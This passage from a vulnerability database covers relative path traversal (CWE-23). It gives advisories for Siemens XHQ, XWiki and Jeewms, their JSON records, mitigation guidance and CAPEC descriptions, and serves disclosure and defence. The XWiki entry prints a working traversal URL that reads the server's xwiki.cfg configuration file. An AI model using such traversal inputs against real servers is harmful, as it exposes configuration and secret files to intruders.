    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/ec7b7e1d-795d-4414-93d5-9df35d2fd391"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-M4C5-25QF-RMM3

Vulnerability from github – Published: 2022-05-24 17:36 – Updated: 2022-05-24 17:36
VLAI
Details

A vulnerability has been identified in XHQ (All Versions < 6.1). The web interface could allow attackers to traverse through the file system of the server based by sending specially crafted packets over the network without authentication.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-19287"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-12-14T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been identified in XHQ (All Versions \u003c 6.1). The web interface could allow attackers to traverse through the file system of the server based by sending specially crafted packets over the network without authentication.",
  "id": "GHSA-m4c5-25qf-rmm3",
  "modified": "2022-05-24T17:36:14Z",
  "published": "2022-05-24T17:36:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19287"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-712690.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-M63C-3RMG-R2CF

Vulnerability from github – Published: 2025-09-03 17:45 – Updated: 2025-09-10 21:14
VLAI
Summary
XWiki configuration files can be accessed through jsx and sx endpoints
Details

Impact

It's possible to get access and read configuration files by using URLs such as http://localhost:8080/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false.

This can apparently be reproduced on Tomcat instances.

Patches

This has been patched in 17.4.0-rc-1, 16.10.7.

Workarounds

There is no known workaround, other than upgrading XWiki.

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List

Attribution

The vulnerability was reported by Gregor Neumann.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-skin-skinx"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.2-milestone-2"
            },
            {
              "fixed": "16.10.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55748"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-03T17:45:11Z",
    "nvd_published_at": "2025-09-03T21:15:32Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nIt\u0027s possible to get access and read configuration files by using URLs such as `http://localhost:8080/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg\u0026minify=false`.\n\nThis can apparently be reproduced on Tomcat instances.\n\n### Patches\n\nThis has been patched in  17.4.0-rc-1, 16.10.7.\n\n### Workarounds\n\nThere is no known workaround, other than upgrading XWiki.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n\n### Attribution\n\nThe vulnerability was reported by Gregor Neumann.",
  "id": "GHSA-m63c-3rmg-r2cf",
  "modified": "2025-09-10T21:14:00Z",
  "published": "2025-09-03T17:45:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m63c-3rmg-r2cf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55748"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/9e7b4c03f2143978d891109a17159f73d4cdd318#diff-ee78930a9ac5ea586179fe8ab88a5fd58e369d175927d1e88a0b4dbc3ebcbf1eR62"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki/xwiki-platform"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-23109"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "XWiki configuration files can be accessed through jsx and sx endpoints"
}

GHSA-M75W-4GMQ-MJ6J

Vulnerability from github – Published: 2025-01-11 09:30 – Updated: 2025-01-11 09:30
VLAI
Details

A vulnerability classified as critical was found in Guangzhou Huayi Intelligent Technology Jeewms up to 20241229. This vulnerability affects unknown code of the file /wmOmNoticeHController.do. The manipulation leads to path traversal: '../filedir'. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 20250101 is able to address this issue. It is recommended to upgrade the affected component.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-0390"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-11T08:15:26Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability classified as critical was found in Guangzhou Huayi Intelligent Technology Jeewms up to 20241229. This vulnerability affects unknown code of the file /wmOmNoticeHController.do. The manipulation leads to path traversal: \u0027../filedir\u0027. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 20250101 is able to address this issue. It is recommended to upgrade the affected component.",
  "id": "GHSA-m75w-4gmq-mj6j",
  "modified": "2025-01-11T09:30:31Z",
  "published": "2025-01-11T09:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0390"
    },
    {
      "type": "WEB",
      "url": "https://gitee.com/erzhongxmu/JEEWMS/issues/IBFKBM"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.291124"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.291124"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20.1
Implementation

Strategy: Input Validation

  • Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
  • Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:
  • realpath() in C
  • getCanonicalPath() in Java
  • GetFullPath() in ASP.NET
  • realpath() or abs_path() in Perl
  • realpath() in PHP
Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-139: Relative Path Traversal

An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.